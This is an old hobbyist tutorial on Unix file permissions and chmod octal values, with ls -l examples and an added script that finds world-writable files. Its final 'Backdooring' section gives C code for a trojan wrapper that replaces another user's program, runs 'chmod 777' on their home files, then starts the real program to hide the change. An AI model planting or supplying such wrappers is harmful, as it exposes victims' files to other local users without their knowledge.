About
In this article I hope to help the reader understand Unix file permissions. Unix file permissions set boundaries for other users who aren't permitted to read, write, or execute a file. Understanding them goes a long way toward stopping access attempts from local users. I will explain the `chmod` command and how it's organized, and what people can do if a file isn't chmod'd correctly. I will also show some backdoor code users may be able to use when chmod settings are incorrect.
------------------------------
Permissions and Such
Now you may be asking "what is chmod?" Well, chmod is basically the Unix command for setting permissions on files. It's as simple as that, and it isn't a hard command to follow. Consider the following...
Owner | Group | Everyone Else
^^ This shows how chmod is handled. This may seem confusing at first but with a few examples you will hopefully understand.
Owner - The owner of the file (basically it's in the owner's dir).
Group - If the owner is in a specific group like wheel, he will be able to give that group permissions on the file that differ from his own and from everyone else's.
Everyone Else - The outside world: other users who are not in his group and, of course, are not him. Everyone else also covers the case where the file is presented on the web; the people `trying` to read/write/exec the file will have permissions different from the owner's, for security reasons.
Consider doing the following:
$ ls -l
$ touch example
$ chmod 777 example
$ ls -la
`$` is the shell prompt. ls is just a command to list files, and -l is an argument to show details (including permission settings). touch just makes the file. chmod just sets the permissions.
-------------------------------------------------
Example:
r = read, w = write, x = execute (exec)
$ root@ANIGMA:~# ls -l
drwxr-xr-x 4 tiffta 1000 1896 2005-03-12 03:21 BitTorrent-3.9.1/
drwx------ 3 root root 136 2005-02-20 19:29 Desktop/
drwxr-xr-x 2 root root 48 2005-03-12 03:20 Incomplete/
drwxrwxrwx 3 root root 1552 2005-03-01 13:55 LimeWire/
drwx------ 7 root root 520 2005-02-20 23:18 Mail/
-rwxr-xr-x 1 root root 11493 2005-03-13 22:46 a.out*
drwxr-xr-x 2 root root 504 2005-02-24 21:07 code/
-rw-r--r-- 1 root root 4194816 2005-03-10 10:18 cr.smc
-rw-r--r-- 1 root root 531 2005-03-10 17:29 data1.cpp
-rw-r--r-- 1 root root 525 2005-03-10 17:28 data1.cpp~
$ chmod 777 data1.cpp
$ ls -l
drwxr-xr-x 4 tiffta 1000 1896 2005-03-12 03:21 BitTorrent-3.9.1/
drwx------ 3 root root 136 2005-02-20 19:29 Desktop/
drwxr-xr-x 2 root root 48 2005-03-12 03:20 Incomplete/
drwxrwxrwx 3 root root 1552 2005-03-01 13:55 LimeWire/
drwx------ 7 root root 520 2005-02-20 23:18 Mail/
-rwxr-xr-x 1 root root 11493 2005-03-13 22:46 a.out*
drwxr-xr-x 2 root root 504 2005-02-24 21:07 code/
-rw-r--r-- 1 root root 4194816 2005-03-10 10:18 cr.smc
-rwxrwxrwx 1 root root 531 2005-03-10 17:29 data1.cpp*
-rw-r--r-- 1 root root 525 2005-03-10 17:28 data1.cpp~
---------------------------------
Okay, now notice that
Old: -rw-r--r-- 1 root root 531 2005-03-10 17:29 data1.cpp
New: -rwxrwxrwx 1 root root 531 2005-03-10 17:29 data1.cpp*
Notice anything?
7       7       7
^ Owner ^ Group ^ Other
x = 1
w = 2
r = 4
1+2+4 = 7
So, 7 = highest permission.
$ chmod 755 example
By doing this:
Owner = r+w+x (full access)
Group = r+x (access, but not full; just reading and executing)
Other = r+x (ditto)
Understanding your rights
Reading access just means being able to cat the file or open it in vi. You can read the source, basically, but you can't execute it. For example, you can't do a
$ ./blah
By not giving users read access, you protect letters or source code that aren't meant to be read.
Execution access is basically being able to `run` something.
$ ./blah
By being able to exec something, you are able to run scripts under someone else's access. So say a user doesn't set an appropriate permission on a file. You can run it under their permissions, which may be higher than yours. Let's say it's root. So it's a good idea to understand what you're doing.
Writing access is basically being able to update something. So say you want to update someone's code. You can backdoor it (which I will show later). Backdooring it can cause all kinds of havoc.
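To check your own files against the rules above, here is a small shell example added for this write-up (it is not part of the original article). It turns the permission string printed by `ls -l` into the chmod digits using r=4, w=2, x=1, and lists anything that "Everyone Else" can write to. The function names `sym_to_octal` and `world_writable` are made up for this example.

```shell
#!/bin/sh
# Added example, not from the original article.

# Convert a permission string as printed by `ls -l` into octal, using the
# article's values r=4, w=2, x=1. Accepts "rwxr-xr-x" or "-rwxr-xr-x".
# Setuid/setgid/sticky letters (s, S, t, T) are rejected, not decoded.
sym_to_octal() {
    perms=$1
    if [ "${#perms}" -eq 10 ]; then
        perms=${perms#?}            # drop the file-type character
    fi
    case $perms in
        *[!rwx-]*) echo "unsupported mode: $1" >&2; return 1 ;;
    esac
    [ "${#perms}" -eq 9 ] || { echo "bad length: $1" >&2; return 1; }
    out=""
    while [ -n "$perms" ]; do
        rest=${perms#???}           # everything after the first triplet
        triplet=${perms%"$rest"}    # owner, then group, then everyone else
        digit=0
        case $triplet in r??) digit=$((digit + 4)) ;; esac
        case $triplet in ?w?) digit=$((digit + 2)) ;; esac
        case $triplet in ??x) digit=$((digit + 1)) ;; esac
        out=$out$digit
        perms=$rest
    done
    echo "$out"
}

# List files and directories under $1 that "Everyone Else" can write to
# (the 2 bit set in the last octal digit). Symlinks are skipped because
# they always show as rwxrwxrwx.
world_writable() {
    find "$1" \( -type f -o -type d \) -perm -0002 -print
}

# Demo on the two data1.cpp listing lines shown in the article.
for m in -rw-r--r-- -rwxrwxrwx; do
    echo "$m = $(sym_to_octal "$m")"
done
```

Run `world_writable "$HOME"` to see what needs tightening; `chmod o-w` on a reported path removes the write bit for everyone else without touching the owner and group bits.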
Backdooring
Let's say that someone has firefox on their desktop. And it's named `firefox`. So you make a `firefox` in your dir. Maybe the code looks something like this...
CODE
#include <stdio.h>
#include <stdlib.h>

int main()
{
    /* Just goes to the user's home dir, and gives full access to all his files. */
    system("cd;chmod 777 *");
    /* Then runs the real program so nothing looks wrong. */
    system("/sbin/firefox");
    return 0;
}
Now, this file should be put in place of the other user's file. Every time he runs the script, he updates his files with full-access permissions. He will also be satisfied, since the real path to firefox is executed.
That code is just an example, I don't know the exact path to firefox, and firefox is just an example I used.
-cheers tecta
